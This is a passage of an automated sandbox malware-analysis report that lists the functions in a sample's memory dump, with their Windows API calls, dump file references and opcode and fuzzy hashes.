                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                    • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0df2ee56318241ec7eb52b68f0c45ef1a1824b48a2f0882bb0a6f0106bebaec2
                                                                                                                                                                                                                                                                                                    • Instruction ID: e99a69dd41085440d89ba8f1c99148cd3a65748c4d248b04be9259533a311e91
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0df2ee56318241ec7eb52b68f0c45ef1a1824b48a2f0882bb0a6f0106bebaec2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE911671D00219EFDF15DFA4DC81AEEB7B9BF08314F108569E915A7291EB309A45CFA0
                                                                                                                                                                                                                                                                                                    Function 00AA2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenu.USER32(?), ref: 00AA2C1F
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00AA2C51
                                                                                                                                                                                                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AA2C79
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA2CAF
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00AA2CE9
                                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(?,?), ref: 00AA2CF7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A743AD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74393: GetCurrentThreadId.KERNEL32 ref: 00A743B4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A72F00), ref: 00A743BB
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AA2D7F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7F292: Sleep.KERNEL32 ref: 00A7F30A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 697c74a6e3a0ee8d5e18b43a220a5b72f3a99ea9753ac109e0fb847f595fff26
                                                                                                                                                                                                                                                                                                    • Instruction ID: 75cd4c037cbda44e86aee554f8d9ce302970a04bb05df17a2800a493740cc0aa
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 697c74a6e3a0ee8d5e18b43a220a5b72f3a99ea9753ac109e0fb847f595fff26
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62717D75E00205AFCB10EFA8C945BAEBBF5EF49320F148459E856EB391DB34ED518B90
                                                                                                                                                                                                                                                                                                    Function 00AA88F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 00AA8992
                                                                                                                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00AA899E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00AA8A79
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00AA8AAC
                                                                                                                                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00000000), ref: 00AA8AE4
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 00AA8B06
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00AA8B1E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f131bd00123bcd1c4acbe048d9dff92aa95378e52daf670c006cb6df48368f04
                                                                                                                                                                                                                                                                                                    • Instruction ID: ee41011aef70d22384e9400b9895d1543a20c5c5a99c25383c7872d14f41c938
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f131bd00123bcd1c4acbe048d9dff92aa95378e52daf670c006cb6df48368f04
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29718F74600205AFDB25DF94C884FBABBB9FF0A340F14445AE895672E1CB39AD41DB51
                                                                                                                                                                                                                                                                                                    Function 00A7B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00A7B8C0
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00A7B8D5
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00A7B936
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00A7B964
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00A7B983
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00A7B9C4
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A7B9E7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ac6c12fb5798024afd4de1cd06b834243fa9f0414a42fffe3846075ccb7e7c63
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2f3a955311c509708816ea8dc295a59746f4536225902047b042575997d69d51
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac6c12fb5798024afd4de1cd06b834243fa9f0414a42fffe3846075ccb7e7c63
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5051C1E16287D53EFB3643348C55BBA7EA95B06704F08C489E2ED468D2C3D8ADC4D761
                                                                                                                                                                                                                                                                                                    Function 00A7B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(00000000), ref: 00A7B6E0
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00A7B6F5
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00A7B756
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A7B782
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A7B79F
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A7B7DE
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A7B7FF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4a70332977cf6dece5d8751b9cdafee18ac0f08d5413bccb3c1cd8fc51e56d48
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7767350bbdaf5c54bce7439c66144b3afab0f873db050ee7f2af91aabb723987
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a70332977cf6dece5d8751b9cdafee18ac0f08d5413bccb3c1cd8fc51e56d48
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E951DEE09286D53EFB368364CC55BBABEA95B46304F0CC489E1DD4A8D2D394EC84D771
                                                                                                                                                                                                                                                                                                    Function 00A457A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00A45F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00A457E3
                                                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00A4585E
                                                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00A45879
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00A4589F
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,00A45F16,00000000,?,?,?,?,?,?,?,?,?,00A45F16,?), ref: 00A458BE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00A45F16,00000000,?,?,?,?,?,?,?,?,?,00A45F16,?), ref: 00A458F7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 60eefab47d16bb0e40d4aeae639680f31ced169059c6953c6931a9a843526987
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3ff908fde07c3905f1587fd8a6369c21e57f66221aaa149b1e2fe2fc05de81e4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60eefab47d16bb0e40d4aeae639680f31ced169059c6953c6931a9a843526987
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3451C275E04649DFCB10CFA8D881BEEBBF8EF49320F14415AE952E7292D7309941CBA0
                                                                                                                                                                                                                                                                                                    Function 00A33090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00A330BB
                                                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00A330C3
                                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00A33151
                                                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00A3317C
                                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00A331D1
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                    • Opcode ID: 540025f083dead945b79df25b8d67643c6cee671ba9057ac5cc6483bdbf06fb4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7948da113b87e5135730087e96ccbbfa1dddd2cde30d2ca525fcac6d86ac28a0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 540025f083dead945b79df25b8d67643c6cee671ba9057ac5cc6483bdbf06fb4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D741D236E08208ABCF10DF68C981AAEBBB5BF45324F148255F815AB392D735DF05CB91
                                                                                                                                                                                                                                                                                                    Function 00A91B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A93AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A93AD7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A93AAB: _wcslen.LIBCMT ref: 00A93AF8
                                                                                                                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A91B6F
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00A91B7E
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00A91C26
                                                                                                                                                                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00A91C56
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 65501b8c23293c67372d6454ac491f55eb9753705284d765e530dbb2986c0e70
                                                                                                                                                                                                                                                                                                    • Instruction ID: f5f8b5829d1ac78c906319be426bc84244ba1903dac19545c5eb5b7b220385e3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65501b8c23293c67372d6454ac491f55eb9753705284d765e530dbb2986c0e70
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8541B131700115AFDB10DF64C984AA9BBE9EF85324F148059E8569B2D2D774AD81CBA1
                                                                                                                                                                                                                                                                                                    Function 00A7D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A7D7CD,?), ref: 00A7E714
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A7D7CD,?), ref: 00A7E72D
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00A7D7F0
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00A7D82A
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7D8B0
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7D8C6
                                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 00A7D90C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                                    • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                                    • Opcode ID: eeba0b0aa8fe0c2cc0d30fcdba3045629e92af6e6c574010b4c862c374920560
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5361e143c6dda4444645449c7539d6d561792155e897b935fc87e08881025216
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eeba0b0aa8fe0c2cc0d30fcdba3045629e92af6e6c574010b4c862c374920560
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 004167719052189EDF12EFA4CE81FDE77B8AF08340F5084EAA549EB141EB35A788CB51
                                                                                                                                                                                                                                                                                                    Function 00AA3899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00AA38B8
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA38EB
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA3920
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00AA3952
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00AA397C
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA398D
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AA39A7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f6d78112bbdcfbb9f78c35a155437bd84bb116d0ab035db12b494cc36ed12e57
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4e2e702fb6215abd64ee60587a915aa3e2c90ff047b5a52397e3f32442c2093a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6d78112bbdcfbb9f78c35a155437bd84bb116d0ab035db12b494cc36ed12e57
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5313232644291AFDB21CF88DC95F6937A4FB8A710F1411A8F5558F2F2CBB4A946CB11
                                                                                                                                                                                                                                                                                                    Function 00A7808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A780D0
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A780F6
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00A780F9
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00A78117
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00A78120
                                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00A78145
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00A78153
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
